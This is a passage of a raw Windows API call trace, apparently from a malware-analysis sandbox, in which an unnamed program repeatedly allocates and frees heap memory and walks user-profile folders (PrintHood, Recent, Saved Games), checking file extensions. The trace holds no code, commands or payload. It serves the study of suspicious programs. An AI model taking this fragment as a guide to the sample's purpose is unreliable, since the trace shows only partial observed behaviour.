hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.528] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\PrintHood\\") returned="PrintHood\\" [0191.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0191.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.528] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.529] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.529] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.529] PathFindFileNameW (pszPath="") returned="" [0191.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.529] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\PrintHood\\*" (normalized: "c:\\users\\keecfmwgj\\printhood\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 0xffffffff [0191.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0191.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0191.531] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0191.531] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.534] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Recent\\") returned="Recent\\" [0191.534] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.534] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.534] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.534] PathFindFileNameW (pszPath="") returned="" [0191.534] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Recent\\*" (normalized: "c:\\users\\keecfmwgj\\recent\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 0xffffffff [0191.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.535] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.535] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.535] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\") returned="Saved Games\\" [0191.535] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.535] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.535] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.535] PathFindFileNameW (pszPath="") returned="" [0191.535] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\*" (normalized: "c:\\users\\keecfmwgj\\saved games\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0191.535] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0191.535] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0191.536] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini") returned=".ini" [0191.536] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0191.536] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0191.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0191.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0191.536] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0191.536] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0191.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.547] RtlAllocateHeap 